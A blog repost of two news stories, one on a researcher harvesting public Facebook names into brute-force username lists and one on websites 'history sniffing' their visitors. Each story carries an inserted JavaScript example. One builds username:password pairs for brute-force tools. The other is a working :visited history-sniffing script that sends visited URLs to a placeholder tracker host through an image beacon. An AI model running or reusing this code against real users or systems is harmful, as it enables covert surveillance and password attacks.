
Friday, August 19, 2011

Facebook - Not So Private!



By Daniel Emery Technology reporter, BBC News



(CANADA) The man who harvested and published the personal details of 100m Facebook users has spoken out about his motives.



Ron Bowes, a Canadian security consultant, used a piece of code to scan Facebook profiles, collecting data not hidden by users' privacy settings.



The list, which contains the URL of every searchable Facebook user's profile, name and unique ID, has been shared as a downloadable file.



Mr Bowes told BBC News that he did it as part of his work on a security tool.



"I'm a developer for the Nmap Security Scanner and one of our recent tools is called Ncrack," he said. "It is designed to test password policies of organisations by using brute force attacks; in other words, guessing every username and password combination."



By downloading the data from Facebook, and compiling a user's first initial and surname, he was able to make a list of the most common probable usernames to use in the tool.



The three most common names, he found, were jsmith, ssmith and skhan.



In theory, researchers could then combine this list with a catalogue of the most commonly used passwords to test the security of sites. Similar techniques could be used by criminals for more nefarious means.
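The list-building the article describes, as an added example written for this page (it is not the BBC's code, nor Mr Bowes' own tooling): derive first-initial-plus-surname usernames from a set of human names, count how often each one occurs, and rank them so the most probable usernames come first. The names below are a small constructed sample, not records from the Facebook list, and the password list in the last function is a placeholder.

```javascript
// Added example: build a frequency-ranked username wordlist from human names,
// the way the article describes (first initial + surname). Not the BBC's or
// Mr Bowes' code; the names below are a small constructed sample, not records
// from the Facebook list.

const SAMPLE_NAMES = [
  "John Smith", "Jane Smith", "Sarah Smith", "Sam Khan", "Shazia Khan",
  "José García", "Mary-Anne O'Brien", "  Peter   Jones ", "J. Smith",
  "Prince", "Jean-Luc Picard", "李 小龙", "Sara Smith",
];

// Fold accents and drop everything but ASCII letters: "García" -> "garcia".
// Names with no Latin letters fold to "" and are skipped by the caller.
function asciiFold(s) {
  return s.normalize("NFKD").replace(/[^A-Za-z]/g, "").toLowerCase();
}

// "Mary-Anne O'Brien" -> "mobrien". Returns null for mononyms or names that
// leave no usable token, so they do not pollute the list.
function toUsername(fullName) {
  const parts = fullName.trim().split(/\s+/).map(asciiFold).filter(Boolean);
  if (parts.length < 2) return null;
  return parts[0][0] + parts[parts.length - 1];
}

// Count each derived username and return them most common first
// (ties broken alphabetically so the output is stable).
function rankUsernames(names) {
  const counts = new Map();
  for (const name of names) {
    const u = toUsername(name);
    if (u !== null) counts.set(u, (counts.get(u) || 0) + 1);
  }
  return [...counts.entries()]
    .sort((a, b) => b[1] - a[1] || a[0].localeCompare(b[0]))
    .map(([username, count]) => ({ username, count }));
}

// The combination the article mentions: top-N usernames crossed with a
// password list, in the user:pass form brute-force tools consume.
// Only run such a list against systems you are authorised to test.
function candidatePairs(ranked, passwords, topN = 3) {
  return ranked.slice(0, topN).flatMap(({ username }) =>
    passwords.map((p) => `${username}:${p}`));
}

console.log(rankUsernames(SAMPLE_NAMES).slice(0, 3));
```

On the constructed sample the top three come out as jsmith, skhan and ssmith, the same three the article reports from the real list (in a different order). The normalisation step matters in practice: without accent folding and stripping of punctuation, "José García" and "Jose Garcia" would count as different usernames and the frequency ranking would be wrong.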



Mr Bowes said his original plan was to "collect a good list of human names that could be used for these tests".



"Once I had the data, though, I realised that it could be of interest to the community if I released it, so I did," he added.



Mr Bowes confirmed that all the data he harvested was already publicly available but acknowledged that if anyone now changed their privacy settings, their information would still be accessible.



"If 100,000 Facebook users decide that they no longer want to be in Facebook's directory, I would still have their name and URL but it would no longer, technically, be public," he said.



Mr Bowes said that collecting the data was in no way irresponsible and likened it to a telephone directory.



"All I've done is compile public information into a nice format for statistical analysis," he said.



Simon Davies from the watchdog Privacy International told BBC News it was an "ethical attack" and noted that no further personal information had been included in the trawl.



"This is a reputational and business issue for Facebook, for now," he said.



"They can continue to ride the risk and hope nothing cataclysmic occurs, but I would argue that Facebook has a special responsibility to go beyond doing the bare minimum," he added.



Snowball effect

Mr Bowes' file has spread rapidly across the net.



On the Pirate Bay, the world's biggest file-sharing website, the list was being distributed and downloaded by thousands of users.



One user said that the list showed "why people need to read the privacy agreements and everything they click through".



In a statement to BBC News, Facebook confirmed that the information in the list was already freely available online.



"No private data is available or has been compromised," the statement added.



That view is shared by Mr Bowes, who added that harvesting this data highlighted the risks users expose themselves to.



"I am of the belief that, if I can do something then there are about 1,000 bad guys that can do it too.



"For that reason, I believe in open disclosure of issues like this, especially when there's minimal potential for anybody to get hurt.



"Since this is already public information, I see very little harm in disclosing it."



Digital trends


However, he said, it also highlighted a new trend that was emerging in the digital age.



"With traditional paper media, it wasn't possible to compile 170 million records in a searchable format and distribute it, but now we can," he said.



"Having the name of one person means nothing, and having the name of a hundred people means nothing; it isn't statistically significant.



"But when you start scaling to 170 million, statistical data emerges that we have never seen in the past."



A spokesperson for Facebook said the list was "similar to the white pages of the phone book".



"This is the information available to enable people to find each other, which is the reason people join Facebook."



"If someone does not want to be found, we also offer a number of controls to enable people not to appear in search on Facebook, in search engines, or share any information with applications."



Earlier this year there was a storm of protest from users of the site over the complexity of Facebook's privacy settings. As a result, the site rolled out simplified privacy controls.



Facebook has a default setting for privacy that makes some user information publicly available. People have to make a conscious choice to opt out of the defaults.






Wednesday, December 8, 2010

Browser Flaw Can Pick Up Your Porn Site Visits

Dozens of websites have been secretly harvesting lists of places that their users previously visited online, everything from news articles to bank sites to pornography, a team of computer scientists found.

The information is valuable for con artists to learn more about their targets and send them personalized attacks. It also allows e-commerce companies to adjust ads or prices — for instance, if the site knows you've just come from a competitor that is offering a lower price.

Although passwords aren't at risk, by harvesting a detailed list of where you've been online, sites can build thorough profiles of their users.

The technique the University of California, San Diego researchers investigated is called "history sniffing" and is a result of the way browsers interact with websites and record where they've been. A few lines of programming code are all a site needs to pull it off.

Although security experts have known for nearly a decade that such snooping is possible, the latest findings offer some of the first public evidence of sites exploiting the problem. Current versions of the Firefox and Internet Explorer browsers still allow this, as do older versions of Chrome and Safari, the researchers said.

The report adds to growing worry about surreptitious surveillance by Internet companies and comes as federal regulators in the U.S. are proposing a "Do Not Track" tool that would prevent advertisers from following consumers around online to sell them more products.

The researchers found 46 sites, ranging from smutty to staid, that tried to pry loose their visitors' browsing histories using this technique, sometimes with homegrown tracking code. Nearly half of the 46 sites, including financial research site Morningstar.com and news site Newsmax.com, used an ad-targeting company, Interclick, which says its code was responsible for the tracking.

Interclick said the tracking was part of an eight-month experiment that the sites weren't aware of. The New York company said it stopped using the technique in October because it wasn't successful in helping match advertisers to groups of Internet users. Interclick emphasized that it didn't store the browser histories.

Morningstar said it ended its relationship with Interclick when it found out about the program, and NewsMax said it didn't know that history sniffing had been used on its users until AP called. NewsMax said it is investigating.

The researchers studied far more sites — a total of the world's 50,000 most popular sites — and said many more behaved suspiciously, but couldn't be proven to use history sniffing. Nearly 500 of the sites studied had characteristics that suggested they could infer browsers' histories, and more than 60 transferred browser histories to the network. But the researchers said they could only prove that 46 had done actual "history hijacking."

"Browser vendors should have fixed this a long time ago," said Jeremiah Grossman, an Internet security expert at WhiteHat Security Inc., which wasn't involved in the study. "It's more evidence that we not only needed the fix, but that people really should upgrade their browsers. Most people wouldn't know this is possible."

The latest versions of Google Inc.'s Chrome and Apple Inc.'s Safari have automatic protections for this kind of snooping, researchers said. Mozilla Corp. said the next version of Firefox will have the same feature, adding that a workaround exists for some older versions as well.

Microsoft Corp. noted that Internet Explorer users can enable a private browsing mode that prevents the browser from logging the user's history, which prevents this kind of spying. But private browsing also strips away important benefits of the browser knowing its own history, such as displaying Google links you've visited in different colors than those you haven't.

"It's surprising, the lifetime that this fundamental a privacy violation can stick around," said Hovav Shacham, an assistant professor of computer science and engineering at UC San Diego and one of the paper's authors.

Internet companies are obsessed with tracking users' behavior so they can target their ads better. Uproar has prompted the Federal Trade Commission to propose rules that would limit advertisers' ability to track Internet users to show them advertisements. The "Do Not Track" tool the commission is proposing could eventually take the form of a browser setting that tells advertisers which visitors are off limits; such a setting, though, wouldn't necessarily block history sniffing.

History sniffing is essentially a side-by-side comparison of Web pages you've already visited with Web pages that a particular site wants to see if you've visited. If there's a match, users likely would never know, but the site administrators would learn a lot about their audiences.

For instance, a popular porn site was checking its visitors' histories to see if they'd visited 23 other pornography sites, and the code used on the Morningstar and NewsMax.com sites looked for matches against 48 specific Web pages, all related to Ford automobiles.

Sites can carry on this kind of inspection very quickly. Grossman said modern programs can check as many as 20,000 Internet addresses per second.
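To make the "few lines of programming code" concrete, here is an added example of the classic CSS :visited history-sniffing technique in browser JavaScript. It is not code from the UC San Diego study or from any of the sites it examined: style visited links a distinctive colour, insert an off-screen link for every URL to be probed, read the computed colour back, and pack the hits into a request the page can fire silently. The probe URLs, the beacon endpoint and the colour values are constructed assumptions.

```javascript
// Added example: CSS :visited history sniffing as described in the article.
// Not code from the UCSD study or from any site it examined. The probe URLs,
// beacon endpoint and colours below are constructed assumptions.

const PROBE_URLS = [
  "https://www.example.com/",
  "https://bank.example.org/login",
  "https://news.example.net/",
];
const UNVISITED_RGB = "rgb(0, 0, 255)";
const VISITED_RGB = "rgb(255, 0, 0)";
const BEACON = "https://tracker.example/collect";   // hypothetical endpoint

// Step 1: make visited and unvisited probe links differ by one property.
function installProbeStyle(doc) {
  const style = doc.createElement("style");
  style.textContent =
    `a.sniff:link { color: ${UNVISITED_RGB}; } ` +
    `a.sniff:visited { color: ${VISITED_RGB}; }`;
  doc.head.appendChild(style);
}

// Step 2: create one <a> per URL and read the colour the browser paints it.
// A browser with the fix reports UNVISITED_RGB for every link, so this
// returns [] there; the Firefox and IE versions the article mentions reveal
// the history.
function sniffHistory(urls, doc, win) {
  const hits = [];
  const container = doc.createElement("div");
  container.style.position = "absolute";     // off-screen, so the user sees nothing
  container.style.left = "-10000px";
  doc.body.appendChild(container);
  for (const url of urls) {
    const a = doc.createElement("a");
    a.className = "sniff";
    a.href = url;
    a.textContent = url;
    container.appendChild(a);
    if (win.getComputedStyle(a).color === VISITED_RGB) hits.push(url);
  }
  container.remove();
  return hits;
}

// Step 3: what the 60-odd sites that "transferred browser histories to the
// network" need: encode the hits into a URL the page can request silently.
function beaconUrl(hits, base = BEACON) {
  const params = new URLSearchParams({ v: hits.join("\n") });
  return `${base}?${params.toString()}`;
}

// Runs only in a real browser; under Node there is no document, so nothing happens.
if (typeof document !== "undefined" && typeof window !== "undefined") {
  installProbeStyle(document);
  const hits = sniffHistory(PROBE_URLS, document, window);
  new Image().src = beaconUrl(hits);   // classic image-beacon exfiltration
}
```

On a browser without the fix, sniffHistory(PROBE_URLS, document, window) returns the subset of probe URLs in the user's history, and the loop can be run over thousands of URLs with nothing visible on the page. The protection the article attributes to current Chrome and Safari, and to the following Firefox release, is to have getComputedStyle report the unvisited style for every link and to restrict which properties a :visited rule may change, so the same code returns an empty list there.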

